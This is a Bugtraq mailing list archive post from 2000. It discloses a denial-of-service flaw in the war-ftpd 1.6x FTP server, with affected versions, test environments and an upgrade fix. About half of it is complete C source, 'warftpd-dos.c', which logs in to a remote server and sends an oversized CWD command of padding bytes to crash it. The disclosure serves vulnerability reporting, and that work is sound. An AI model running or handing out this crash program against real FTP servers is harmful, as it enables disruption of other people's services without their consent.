Bugtraq mailing list archives
war-ftpd 1.6x DoS
From: crc () SIRIUS IMASY OR JP (Toshimi Makino)
Date: Tue, 1 Feb 2000 16:58:46 +0900
Hello, "war-ftpd" is very popular ftp server for Windows95/98/NT. I found DoS problem to "war-ftpd 1.6x" recently. Outline: It seems to occur because the bound check of the command of MKD/CWD that uses it is imperfect when this problem controls the directory. However, could not hijack the control of EIP so as long as I test. It is because not able to overwrite the RET address, because it seems to be checking buffer total capacity properly in 1.66x4 and later. The boundary of Access Violation breaks out among 8182 bytes from 533 bytes neighborhood although it differs by the thread that receives attack. The version that is confirming this vulnerable point is as follows. 1.66x4s, 1.67-3 The version that this vulnerable point was not found is as follows. 1.71-0 Test Environments: Microsoft WindowsNT 4.0 Workstation SP6a Japanese version+IE4.0SP2 Microsoft WindowsNT 4.0 Workstation SP5 Japanese version+IE4.0SP2 Microsoft WindowsNT 4.0 Server SP4 Japanese version Solution: 1.70-1 should be used to solve this problem fundamentally. Because it becomes "Access denied" in 1.71-0 DoS did not break out. --- warftpd-dos.c I coded program for the reappearance of this problem. The contents apply DoS attack for "war-ftpd" to the server who is working from the remote. /*--------------------------------------------------------------*/ /* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/ /*--------------------------------------------------------------*/ #include <stdio.h> #include <string.h> #include <winsock.h> #include <windows.h> #define FTP_PORT 21 #define MAXBUF 8182 //#define MAXBUF 553 #define MAXPACKETBUF 32000 #define NOP 0x90 void main(int argc,char *argv[]) { SOCKET sock; unsigned long victimaddr; SOCKADDR_IN victimsockaddr; WORD wVersionRequested; int nErrorStatus; static unsigned char buf[MAXBUF],packetbuf[MAXPACKETBUF],*q; hostent *victimhostent; WSADATA wsa; if (argc < 3){ printf("Usage: %s TargetHost UserName Password\n",argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); nErrorStatus = WSAStartup(wVersionRequested, &wsa); if (atexit((void (*)(void))(WSACleanup))) { fprintf(stderr,"atexit(WSACleanup)failed\n"); exit(-1); } if ( nErrorStatus != 0 ) { fprintf(stderr,"Winsock Initialization failed\n"); exit(-1); } if ((sock=socket(AF_INET,SOCK_STREAM,0))==INVALID_SOCKET){ fprintf(stderr,"Can't create socket.\n"); exit(-1); } victimaddr = inet_addr((char*)argv[1]); if (victimaddr == -1) { victimhostent = gethostbyname(argv[1]); if (victimhostent == NULL) { fprintf(stderr,"Can't resolve specified host.\n"); exit(-1); } else victimaddr = *((unsigned long *)((victimhostent->h_addr_list)[0])); } victimsockaddr.sin_family = AF_INET; victimsockaddr.sin_addr.s_addr = victimaddr; victimsockaddr.sin_port = htons((unsigned short)FTP_PORT); memset(victimsockaddr.sin_zero,(int)0,sizeof(victimsockaddr.sin_zero)); if(connect(sock,(struct sockaddr *)&victimsockaddr,sizeof(victimsockaddr)) == SOCKET_ERROR){ fprintf(stderr,"Connection refused.\n"); exit(-1); } printf("Attacking war-ftpd ...\n"); recv(sock,(char *)packetbuf,MAXPACKETBUF,0); sprintf((char *)packetbuf,"USER %s\r\n",argv[2]); send(sock,(char *)packetbuf,strlen((char *)packetbuf),0); recv(sock,(char *)packetbuf,MAXPACKETBUF,0); sprintf((char *)packetbuf,"PASS %s\r\n",argv[3]); send(sock,(char *)packetbuf,strlen((char *)packetbuf),0); recv(sock,(char *)packetbuf,MAXPACKETBUF,0); memset(buf,NOP,MAXBUF); buf[MAXBUF-1]=0; sprintf((char *)packetbuf,"CWD %s\r\n",buf); send(sock,(char *)packetbuf,strlen((char *)packetbuf),0); Sleep(100); shutdown(sock, 2); closesocket(sock); WSACleanup(); printf("done.\n"); } ---- Toshimi Makino E-mail:crc () sirius imasy or jp
Current thread:
- Re: SyGate 3.11 Port 7323 / Remote Admin hole Brian Hampson (Jan 31)
- <Possible follow-ups>
- Re: SyGate 3.11 Port 7323 / Remote Admin hole Russ (Feb 01)
- war-ftpd 1.6x DoS Toshimi Makino (Jan 31)
- Re: war-ftpd 1.6x DoS Jarle Aase (Feb 02)
- [xforce () iss net: ISSalert: ISS E-Security Alert: Form Tampering Vulnerabilities in Several Web-Based Shopping Cart Applications] Patrick Oonk (Feb 01)
- SV: SyGate 3.11 Port 7323 / Remote Admin hole Sani Huttunen (Feb 01)
- vulnerability in Linux Debian default boot configuration Pierre Beyssac (Feb 02)
- [Debian] New version of apcd released Aleph One (Feb 02)
- Webspeed security issue George (Feb 03)
- war-ftpd 1.6x DoS Toshimi Makino (Jan 31)